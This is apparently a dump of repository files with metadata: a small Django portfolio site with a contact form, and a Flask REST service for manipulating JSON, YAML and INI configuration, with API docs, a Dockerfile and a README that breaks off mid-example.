"content_id": "d576fd4d56e49e2a366216b051b72c21aecdf811",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 9,
"path": "/main/urls.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import home, portfolio, contact, success2\n\nurlpatterns = [\n path('', home),\n path('portfolio', portfolio),\n path('contact', contact),\n path('success2', success2),\n]\n"
},
{
"alpha_fraction": 0.6391304135322571,
"alphanum_fraction": 0.6417391300201416,
"avg_line_length": 30.94444465637207,
"blob_id": "de0f2cad98bf299d27e847864cd3c7c704fe9012",
"content_id": "86a90f8d2569abc24de6d9bed366064f1f394839",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 36,
"path": "/main/views.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django.core.mail import send_mail\nfrom django.http import HttpResponse, BadHeaderError\nfrom django.shortcuts import render\n\nfrom .forms import ContactForm\n\n\n# Create your views here.\n\ndef home(request):\n return render(request, 'main/about.html', {'title': 'about'})\n\n\ndef portfolio(request):\n return render(request, 'main/portfolio.html', {'title': 'portfolio'})\n\n\ndef success2(request):\n return render(request, 'main/success2.html', {'title': 'Thanks for your message'})\n\n\ndef contact(request):\n if request.method == 'GET':\n form = ContactForm()\n else:\n form = ContactForm(request.POST)\n if form.is_valid():\n subject = form.cleaned_data['subject']\n from_email = form.cleaned_data['from_email']\n message = form.cleaned_data['message']\n try:\n send_mail(subject, message, from_email, ['[email protected]'])\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n return render(request, 'main/success2.html', {'title': 'Thanks for your message'})\n return render(request, \"main/contact.html\", {'form': form})\n"
},
{
"alpha_fraction": 0.599552571773529,
"alphanum_fraction": 0.6017897129058838,
"avg_line_length": 30.928571701049805,
"blob_id": "5abe9ba80731b2eb663c6eef8129e2246fbe30d2",
"content_id": "3b4339d57a5840cbc7da6ec9f262662bc59c0f09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 28,
"path": "/templates/main/about.html",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n{% load static %}\n\n{% block head %}\n\n{% endblock %}\n\n{% block content %}\n\n<div class=\"container\">\n <div class=\"profile-box\">\n <div class=\"about\">\n ABOUT ME\n </div>\n <div class=\"about-content\">\n My name is Dominik and I'm web developer.<br>\n I'm relatively young because I'm only 16. I started making pages recently.Besides programming, I like to play\n <a class=\"link\" href=\"https://eune.leagueoflegends.com/en-pl/how-to-play/\" target=\"_blank\">league</a>. I think I'm very sociable and it's not difficult to make new friends for me. My second passion is gym, I really like going there because I know that all the effort will pay off in the future.\n </div>\n <div class=\"profileimg\">\n </div>\n <hr>\n </div>\n <div class=\"content-box\">\n\n </div>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.703529417514801,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 59.71428680419922,
"blob_id": "3e50c2062aed5a97ad5c653fcbf8a1435e7f0b73",
"content_id": "888bb95e04b5353dde03b611db11102830e47d43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 7,
"path": "/main/forms.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django import forms\n\n\nclass ContactForm(forms.Form):\n from_email = forms.EmailField(max_length=100, widget=forms.EmailInput(attrs={'placeholder': 'Your e-mail','class' : 'email'}))\n subject = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'placeholder': 'Subject','class' : 'subject'}))\n message = forms.CharField(widget=forms.Textarea(attrs={'placeholder': 'Your message','class' : 'message'}))\n"
},
{
"alpha_fraction": 0.56640625,
"alphanum_fraction": 0.58203125,
"avg_line_length": 15,
"blob_id": "b406b7d4bffbfc7a8b4bbbc14f40faa76ab5f140",
"content_id": "4103283b32a8953c554bddc2edc3ef0eb2533724",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 16,
"path": "/templates/main/portfolio.html",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n{% load static %}\n\n{% block head %}\n\n{% endblock %}\n\n{% block content %}\n\n<div class=\"container\">\n <h1 class=\"subtitle\">Portfolio</h1>\n <hr>\n <h2 class=\"illdosth\">If I do something, I'll add</h2>\n</div>\n\n{% endblock %}\n"
}
] | 5 |
ztj1993/config-api
|
https://github.com/ztj1993/config-api
|
6a025a057d2f780b84ce9d58687ff5391bed8dd6
|
bd6ba6313d9f5710339ebca06ee4b59e3d20dba3
|
fb6508712051655dbcf386b9b5e6f340ad5d9a79
|
refs/heads/master
| 2021-06-26T20:45:27.953148 | 2019-10-24T10:40:47 | 2019-10-25T01:34:24 | 216,966,269 | 3 | 0 |
MIT
| 2019-10-23T04:14:33 | 2019-12-11T03:27:14 | 2021-03-25T23:04:07 |
Python
|
[
{
"alpha_fraction": 0.6151832342147827,
"alphanum_fraction": 0.6178010702133179,
"avg_line_length": 12.642857551574707,
"blob_id": "32d41a4cc452ae8caf6346f6aab08c9a06b80698",
"content_id": "6d26a6bddde51bae06fbb863c8a6361faef348ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 28,
"path": "/App/Excepts.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 异常模块\n# Author: Ztj\n# Email: [email protected]\n\nclass ExceptionBase(Exception):\n \"\"\"基础异常\"\"\"\n pass\n\n\nclass CursorNotExist(ExceptionBase):\n \"\"\"游标不存在\"\"\"\n pass\n\n\nclass CursorExisting(ExceptionBase):\n \"\"\"游标已经存在\"\"\"\n pass\n\n\nclass KeyNotExist(ExceptionBase):\n \"\"\"键不存在\"\"\"\n pass\n\n\nclass RequestShort(ExceptionBase):\n \"\"\"缺少请求参数 Key\"\"\"\n pass\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6805555820465088,
"avg_line_length": 17,
"blob_id": "a78db6ae43e47996d0158e693fa031dfd5c0c53c",
"content_id": "982f1d56cfc385daa454800709db5c6367738ae9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 72,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "Flask==1.1.1\nPyYAML==5.1.2\npython-dotenv==0.10.3\npy-ztj-registry==0.0.2\n"
},
{
"alpha_fraction": 0.5971524119377136,
"alphanum_fraction": 0.6013400554656982,
"avg_line_length": 28.121952056884766,
"blob_id": "30ab8a1f16f1d2d60597a3f684034c4322ddd931",
"content_id": "330ec597b1caa64e9e37bc0a37412d75e8ede1bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1270,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 41,
"path": "/App/Libs.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 库模块\n# Author: Ztj\n# Email: [email protected]\n\nimport configparser\nfrom io import StringIO\n\nfrom dotenv import dotenv_values\n\n\ndef env_to_ini(env_str, prefix=None, delimiter='_', section_lower=False, key_lower=False):\n \"\"\"环境变量文本转 INI 文本\"\"\"\n ini_parser = configparser.ConfigParser()\n # 解析环境变量\n file_stream = StringIO(env_str)\n file_stream.seek(0)\n items = dotenv_values(stream=file_stream)\n for item in items:\n # 提取关键元素\n words = item.split(delimiter)\n if len(words) < 3:\n continue\n if prefix is not None:\n # 校验前缀\n item_prefix = words.pop(0)\n if not item_prefix == prefix:\n continue\n section = words.pop(0)\n key = delimiter.join(words)\n value = items.get(item)\n # 设置关键元素\n section = section.lower() if section_lower else section\n key = key.lower() if key_lower else key\n if not ini_parser.has_section(section):\n ini_parser.add_section(section)\n ini_parser.set(section, key, value)\n # 输出 INI 文本\n output_stream = StringIO()\n ini_parser.write(output_stream)\n return output_stream.getvalue()\n"
},
{
"alpha_fraction": 0.5804196000099182,
"alphanum_fraction": 0.6523476243019104,
"avg_line_length": 20.7608699798584,
"blob_id": "8f54b0fd8832b5acc4f9e025cb776caa81f252b4",
"content_id": "2f81fc0777154cfa8ba35d741de5ed6d00119f07",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1225,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 46,
"path": "/Docs/EnvToIni.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# 环境变量转 INI 配置接口\n\n## 应用示例\n```\n$ export FRP_COMMON_SERVER_ADDR=0.0.0.0\n$ export FRP_COMMON_BIND_PORT=7000\n$ export FRP_SSH_TYPE=tcp\n$ export FRP_SSH_LOCAL_IP=127.0.0.1\n$ export FRP_SSH_LOCAL_PORT=22\n$ export FRP_SSH_REMOTE_PORT=6000\n\n$ data=$(env | grep FRP) && echo \"${data}\"\n\n FRP_COMMON_SERVER_ADDR=0.0.0.0\n FRP_COMMON_BIND_PORT=7000\n FRP_SSH_TYPE=tcp\n FRP_SSH_LOCAL_IP=127.0.0.1\n FRP_SSH_LOCAL_PORT=22\n FRP_SSH_REMOTE_PORT=6000\n\n$ query_args=\"prefix=FRP&delimiter=_§ion_lower=1&key_lower=1\"\n$ curl -H \"Content-Type: text/plain\" http://127.0.0.1:5000/env_to_ini?${query_args} -d \"${data}\"\n\n [common]\n server_addr = 0.0.0.0\n bind_port = 7000\n\n [ssh]\n local_ip = 127.0.0.1\n remote_port = 6000\n local_port = 22\n type = tcp\n\n```\n\n## 接口文档\n- 接口路径:/env_to_ini\n- 返回数据:INI 配置文件文本\n\n参数名|类型|必填|说明\n---|---|---|---\nprefix|query|否|前缀,只处理指定前缀的环境变量\ndelimiter|query|否|分隔符,默认下划线,用于分割前缀、配置组和配置键\nsection_lower|query|否|配置组是否转为小写\nkey_lower|query|否|配置键是否转为小写\n-|data|是|环境变量文本数据\n"
},
{
"alpha_fraction": 0.6256157755851746,
"alphanum_fraction": 0.6995074152946472,
"avg_line_length": 12.533333778381348,
"blob_id": "9340cb499aedf47cc9962f946a3531511ef977b2",
"content_id": "bea5b7f8122f380c1489ded61ad33940fb5222ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 203,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 15,
"path": "/Dockerfile",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-alpine\n\nENV FLASK_HOST=0.0.0.0\nENV FLASK_PORT=5000\nENV FLASK_DEBUG=0\n\nEXPOSE 5000\n\nWORKDIR /app\n\nCOPY . .\n\nRUN pip install --no-cache-dir -r requirements.txt\n\nCMD [ \"python\", \"main.py\" ]\n"
},
{
"alpha_fraction": 0.5870348215103149,
"alphanum_fraction": 0.5902360677719116,
"avg_line_length": 28.05813980102539,
"blob_id": "1ca5d3680acd755d88059f2ab172bf7c7afe0b99",
"content_id": "1726e6116bbc13e03fc386b126b1364991b552e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 86,
"path": "/App/MemoryData.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 内存数据模块\n# Author: Ztj\n# Email: [email protected]\n\nimport math\n\nfrom .Env import *\n\n\nclass MemoryData:\n \"\"\"内存数据对象\"\"\"\n CursorData = dict()\n ExpireData = dict()\n expire_key_divisor = 60\n\n @staticmethod\n def get_cursor_id():\n \"\"\"获取游标编号\"\"\"\n return uuid.uuid4().int\n\n def init_cursor(self, delimiter='.') -> int:\n \"\"\"初始化游标\"\"\"\n cursor_id = self.get_cursor_id()\n cursor_target = registry.Registry()\n cursor_target.separator = delimiter\n rs_target = self.CursorData.setdefault(cursor_id, cursor_target)\n if not cursor_target == rs_target:\n raise Excepts.CursorExisting()\n return cursor_id\n\n def get_cursor_target(self, cursor_id) -> registry.Registry:\n \"\"\"获取游标对象\"\"\"\n cursor_target = self.CursorData.get(cursor_id)\n if not isinstance(cursor_target, registry.Registry):\n raise Excepts.CursorNotExist()\n return cursor_target\n\n def delete_cursor(self, cursor_id):\n \"\"\"删除游标\"\"\"\n return self.CursorData.pop(cursor_id, False)\n\n def store_expire_key(self, expire_time):\n \"\"\"存储有效期键\"\"\"\n return math.ceil(expire_time / self.expire_key_divisor)\n\n def delete_expire_key(self, expire_time):\n \"\"\"删除有效期键\"\"\"\n return int(expire_time / self.expire_key_divisor)\n\n def init_expire(self, expire_time):\n \"\"\"初始化有效期\"\"\"\n key = self.store_expire_key(expire_time)\n self.ExpireData.setdefault(key, list())\n\n def set_cursor_expire(self, cursor_id, expire=300):\n \"\"\"设置游标有效期\"\"\"\n cur_time = int(time.time())\n expire_time = cur_time + expire\n self.init_expire(expire_time)\n self.get_expire(expire_time).append(cursor_id)\n\n def get_expire(self, expire_time) -> list:\n \"\"\"获取有效期列表\"\"\"\n key = self.store_expire_key(expire_time)\n return self.ExpireData.get(key)\n\n def pop_expire(self, expire_time) -> list:\n \"\"\"弹出有效期\"\"\"\n key = self.delete_expire_key(expire_time)\n return self.ExpireData.pop(key, False)\n\n def clear(self, clear_time):\n \"\"\"清理内存\"\"\"\n cursor_ids = self.pop_expire(int(clear_time))\n if cursor_ids is False:\n return False\n for cursor_id in cursor_ids:\n self.delete_cursor(cursor_id)\n return True\n\n def clear_listen(self):\n \"\"\"清理内存监听\"\"\"\n while True:\n self.clear(int(time.time()))\n time.sleep(self.expire_key_divisor / 2)\n"
},
{
"alpha_fraction": 0.6146010160446167,
"alphanum_fraction": 0.6196944117546082,
"avg_line_length": 23.54166603088379,
"blob_id": "2f95807a3f354c9ce5c7dec91316f82b2da724c7",
"content_id": "b5adf4fb072ffed74a866c5c7f81744c80407642",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 24,
"path": "/App/ApiMonitor.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 监控接口模块\n# Author: Ztj\n# Email: [email protected]\n\nfrom .Env import *\n\nMonitorBlueprint = flask.Blueprint('ApiMonitor', __name__, url_prefix='/monitor')\n\n\nclass ApiMonitor:\n \"\"\"监控接口\"\"\"\n\n @staticmethod\n @MonitorBlueprint.route('/cursors', methods=['GET', 'POST'])\n def cursors():\n \"\"\"获取内存游标键\"\"\"\n return json.dumps(list(MemoryData.CursorData.keys()), indent=4)\n\n @staticmethod\n @MonitorBlueprint.route('/expires', methods=['GET', 'POST'])\n def expires():\n \"\"\"获取失效数据\"\"\"\n return json.dumps(MemoryData.ExpireData, indent=4)\n"
},
{
"alpha_fraction": 0.6524437665939331,
"alphanum_fraction": 0.6741660237312317,
"avg_line_length": 23.788461685180664,
"blob_id": "69c834ad345aeae55c9c9128f57083037720b83f",
"content_id": "1b106cb32e2ab6408ff5eedce3be62705cc49aed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1397,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 52,
"path": "/App/FlaskErrorHandler.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 错误处理信息返回模块\n# Author: Ztj\n# Email: [email protected]\n\nimport yaml.scanner\n\nfrom .Env import *\n\n\nclass FlaskErrorHandler:\n \"\"\"错误处理对象\"\"\"\n\n @staticmethod\n @FlaskApp.errorhandler(404)\n def error_handler_exception(ex):\n return str('接口不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.CursorNotExist)\n def error_handler_exception(ex):\n return str('游标不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.CursorExisting)\n def error_handler_exception(ex):\n return str('游标已经存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.KeyNotExist)\n def error_handler_exception(ex):\n return str('键不存在'), 404\n\n @staticmethod\n @FlaskApp.errorhandler(json.decoder.JSONDecodeError)\n def error_handler_exception(ex):\n return str('JSON 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(yaml.scanner.ScannerError)\n def error_handler_exception(ex):\n return str('YAML 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(yaml.scanner.ScannerError)\n def error_handler_exception(ex):\n return str('YAML 解析错误'), 500\n\n @staticmethod\n @FlaskApp.errorhandler(Excepts.RequestShort)\n def error_handler_exception(ex):\n return str('缺失请求参数 %s' % ex), 400\n"
},
{
"alpha_fraction": 0.5830485224723816,
"alphanum_fraction": 0.5857826471328735,
"avg_line_length": 26.60377311706543,
"blob_id": "7fda9632d1f6fae1aec1b2cf94a93a57fdb4b4bd",
"content_id": "e183427fc8c5f78c7f78776bfe011f0ccfbb6971",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1515,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 53,
"path": "/App/ApiBase.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 基本接口模块\n# Author: Ztj\n# Email: [email protected]\n\nimport threading\n\nfrom .Env import *\n\n\nclass ApiBase:\n \"\"\"基本接口\"\"\"\n\n @staticmethod\n @FlaskApp.before_first_request\n def memory_clear_listen():\n \"\"\"内存清理监听\"\"\"\n threading.Thread(target=MemoryData.clear_listen, args=()).start()\n\n @staticmethod\n @FlaskApp.route('/', methods=['GET', 'POST'])\n def api_root():\n return 'ok'\n\n @staticmethod\n @FlaskApp.route('/init', methods=['GET', 'POST'])\n def cursor_init():\n \"\"\"初始化游标\"\"\"\n delimiter = str(flask.request.values.get('delimiter', '.'))\n expire = int(flask.request.values.get('expire', 300))\n\n cursor_id = MemoryData.init_cursor(delimiter)\n MemoryData.set_cursor_expire(cursor_id, expire)\n\n return str(cursor_id)\n\n @staticmethod\n @FlaskApp.route('/env_to_ini', methods=['GET', 'POST'])\n def env_to_ini():\n \"\"\"初始化游标\"\"\"\n prefix = flask.request.values.get('prefix')\n delimiter = str(flask.request.values.get('delimiter', '_'))\n section_lower = bool(flask.request.values.get('section_lower', False))\n key_lower = bool(flask.request.values.get('key_lower', False))\n env_str = str(flask.request.get_data().decode())\n\n return Libs.env_to_ini(\n env_str,\n prefix=prefix,\n delimiter=delimiter,\n section_lower=section_lower,\n key_lower=key_lower\n )\n"
},
{
"alpha_fraction": 0.7309562563896179,
"alphanum_fraction": 0.7487844228744507,
"avg_line_length": 25.826086044311523,
"blob_id": "33988a38b584c805da955122716fa6a146a1f51e",
"content_id": "3d1ed9e3cfd150452236c02139cfd883c60ad1f6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/main.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 入口模块\n# Author: Ztj\n# Email: [email protected]\n\nimport os\n\nfrom App.ApiBase import ApiBase\nfrom App.ApiCursor import CursorBlueprint\nfrom App.ApiMonitor import MonitorBlueprint\nfrom App.Env import *\nfrom App.FlaskErrorHandler import FlaskErrorHandler\n\nApiBase = ApiBase\nFlaskErrorHandler = FlaskErrorHandler\n\nFLASK_HOST = os.getenv(\"FLASK_HOST\", \"127.0.0.1\")\nFLASK_PORT = os.getenv(\"FLASK_PORT\", 5000)\n\nif __name__ == '__main__':\n FlaskApp.register_blueprint(CursorBlueprint)\n FlaskApp.register_blueprint(MonitorBlueprint)\n FlaskApp.run(host=FLASK_HOST, port=FLASK_PORT, threaded=True)\n"
},
{
"alpha_fraction": 0.7154046893119812,
"alphanum_fraction": 0.7180156707763672,
"avg_line_length": 12.206896781921387,
"blob_id": "74bf3c57df1a1cab130f5ae5c32cf4ee2103c4d1",
"content_id": "9e1815198375e03656b4b57de42c0043b3441ebb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 29,
"path": "/App/Env.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 环境模块\n# Author: Ztj\n# Email: [email protected]\n\nimport json\nimport time\nimport uuid\n\nimport flask\nimport registry\nimport yaml\n\nfrom . import Excepts\nfrom . import Libs\nfrom .MemoryData import MemoryData\n\njson = json\nuuid = uuid\ntime = time\n\nyaml = yaml\nregistry = registry\n\nMemoryData = MemoryData()\nExcepts = Excepts\nLibs = Libs\n\nFlaskApp = flask.Flask('APP')\n"
},
{
"alpha_fraction": 0.5407782793045044,
"alphanum_fraction": 0.5439765453338623,
"avg_line_length": 27.86153793334961,
"blob_id": "2df69d05d8226565ede8798a020cf9d566982451",
"content_id": "dd940cf4be1292d2d871d828da7d9d5d490fbca7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3854,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 130,
"path": "/App/ApiCursor.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 游标接口模块\n# Author: Ztj\n# Email: [email protected]\n\nfrom .Env import *\n\nCursorBlueprint = flask.Blueprint('ApiCursor', __name__, url_prefix='/<int:cursor_id>')\n\n\nclass ApiCursor:\n \"\"\"游标接口\"\"\"\n\n @staticmethod\n def req_key():\n \"\"\"请求键\"\"\"\n key = flask.request.values.get('key')\n if key is None:\n raise Excepts.RequestShort('key')\n return key\n\n @staticmethod\n def req_data(data_type):\n \"\"\"请求数据\"\"\"\n if data_type == 'str':\n val = str(flask.request.get_data().decode())\n elif data_type == 'int':\n val = int(flask.request.get_data().decode())\n elif data_type == 'bool':\n val = flask.request.get_data().decode()\n val = True if val == 'true' else False\n elif data_type == 'json':\n val = json.loads(flask.request.get_data())\n elif data_type == 'yaml':\n val = yaml.load(flask.request.get_data())\n else:\n val = flask.request.get_data().decode()\n return val\n\n @staticmethod\n @CursorBlueprint.url_value_preprocessor\n def init_cursor_target(endpoint, values):\n \"\"\"初始化游标数据\"\"\"\n cursor_id = values.pop('cursor_id')\n flask.g.cursor_target = MemoryData.get_cursor_target(cursor_id)\n\n @staticmethod\n @CursorBlueprint.route('/set/<data_type>', methods=['GET', 'POST'])\n def set(data_type):\n \"\"\"设置数据\"\"\"\n key = ApiCursor.req_key()\n data = ApiCursor.req_data(data_type)\n\n flask.g.cursor_target.set(key, data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/append/<data_type>', methods=['GET', 'POST'])\n def append(data_type):\n \"\"\"追加数据\"\"\"\n key = ApiCursor.req_key()\n data = ApiCursor.req_data(data_type)\n\n flask.g.cursor_target.append(key, data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/unset', methods=['GET', 'POST'])\n def unset():\n \"\"\"删除数据\"\"\"\n key = ApiCursor.req_key()\n flask.g.cursor_target.unset(key, clear=True)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/get/<data_type>', methods=['GET', 'POST'])\n def get(data_type):\n \"\"\"获取数据\"\"\"\n key = ApiCursor.req_key()\n val = flask.g.cursor_target.get(key)\n\n if data_type == 'json':\n return json.dumps(val, indent=4)\n elif data_type == 'yaml':\n return yaml.dump(val)\n elif data_type == 'str':\n return str(val)\n else:\n raise flask.abort(404)\n\n @staticmethod\n @CursorBlueprint.route('/output/<data_type>', methods=['GET', 'POST'])\n def output(data_type):\n \"\"\"输出数据\"\"\"\n val = flask.g.cursor_target.get()\n\n if data_type == 'json':\n return json.dumps(val, indent=4)\n elif data_type == 'yaml':\n return yaml.dump(val)\n else:\n raise flask.abort(404)\n\n @staticmethod\n @CursorBlueprint.route('/load/<data_type>', methods=['GET', 'POST'])\n def load(data_type):\n \"\"\"加载数据\"\"\"\n if data_type == 'json':\n data = json.loads(flask.request.get_data())\n elif data_type == 'yaml':\n data = yaml.load(flask.request.get_data())\n else:\n raise flask.abort(404)\n\n flask.g.cursor_target.load(data)\n return 'ok'\n\n @staticmethod\n @CursorBlueprint.route('/key/<operator>', methods=['GET', 'POST'])\n def key(operator):\n \"\"\"键操作\"\"\"\n key = ApiCursor.req_key()\n val = flask.g.cursor_target.get(key)\n\n if val is None:\n raise Excepts.KeyNotExist()\n elif operator == 'exist':\n return 'ok'\n elif operator == 'type':\n return type(val)\n"
},
{
"alpha_fraction": 0.6103174686431885,
"alphanum_fraction": 0.6103174686431885,
"avg_line_length": 15.15384578704834,
"blob_id": "ca42dccc6b988b67fcb1ad38b5fc75c426a55ee8",
"content_id": "c97753f9e9ada716f264e163b2beabb25d93b846",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1856,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 78,
"path": "/Docs/Api.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# 接口文档\n\n## 快速预览\n```\n初始配置:/init\n加载数据:/<cursor_id>/load/<data_type>\n设置数据:/<cursor_id>/set/<data_type>\n追加数据:/<cursor_id>/append/<data_type>\n删除数据:/<cursor_id>/unset\n获取数据:/<cursor_id>/get/<data_type>\n输出数据:/<cursor_id>/set/<data_type>\n```\n\n## 详细说明\n\n### 初始配置\n- 接口路径:/init\n- 返回数据:游标编号 (cursor_id)\n\n### 加载数据\n- 接口路径:/<cursor_id>/load/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml\n-|data|是|数据\n\n### 设置数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str, bool\nkey|query|是|键\n-|data|是|数据\n\n### 追加数据\n- 接口路径:/<cursor_id>/append/<data_type>\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str, bool\nkey|query|是|键\n-|data|是|数据\n\n### 删除数据\n- 接口路径:/<cursor_id>/unset\n- 返回数据:ok\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\nkey|query|是|键\n\n### 获取数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:根据 <data_type> 返回\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml, str\nkey|query|是|键\n\n### 输出数据\n- 接口路径:/<cursor_id>/set/<data_type>\n- 返回数据:根据 <data_type> 返回\n\n参数名|类型|必填|说明\n---|---|---|---\ncursor_id|path|是|游标编号\ndata_type|path|是|数据类型,支持 json, yaml\n"
},
{
"alpha_fraction": 0.5757575631141663,
"alphanum_fraction": 0.6339802742004395,
"avg_line_length": 21.592308044433594,
"blob_id": "060bf8feb31186d3e620b9b21192597760676ce1",
"content_id": "e8f3142b33c70725c685870c8feeca25e7cb0440",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3455,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 130,
"path": "/README.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# Config Api\n\n这是一个 config restful api 接口。\n\n主要解决在命令行下操作 json, yaml, ini 等配置文件问题。\n\n## 项目功能\n- 通过 API 接口操作配置文件\n- 支持 JSON, YAML 配置文件的增删改查\n- 输出 JSON, YAML 配置文件\n- 支持将环境变量转为 INI 配置文件\n\n## 项目地址\n- Github(国外):https://github.com/ztj1993/config-api.git\n- Gitee(国内):https://gitee.com/zhangtianjie/config-api.git\n\n## 项目运行\n```\npip install -r requirements.txt\npython main.py\n```\n\n```\ndocker pull ztj1993/config-api\ndocker run -d --name config-api -p 5000:5000 ztj1993/config-api\n```\n\n## 使用示例\n\n> JSON 配置文件操作示例\n\n```\n$ uri=http://127.0.0.1:5000\n\n$ #获取配置原始数据\n$ data=$(cat /etc/docker/daemon.json) && echo ${data}\n\n {\n \"registry-mirrors\": [\"http://ef017c13.m.daocloud.io\"]\n }\n\n$ #初始化配置游标\n$ cursor_id=$(curl -fsS ${uri}/init) && echo ${cursor_id}\n\n 158853936809905161020585456234816085535\n\n$ cursor_uri=${uri}/${cursor_id}\n\n$ #将配置上传到游标\n$ curl ${cursor_uri}/load/json -d \"${data}\"\n\n ok\n\n$ #操作配置\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/bool?key=tlsverify 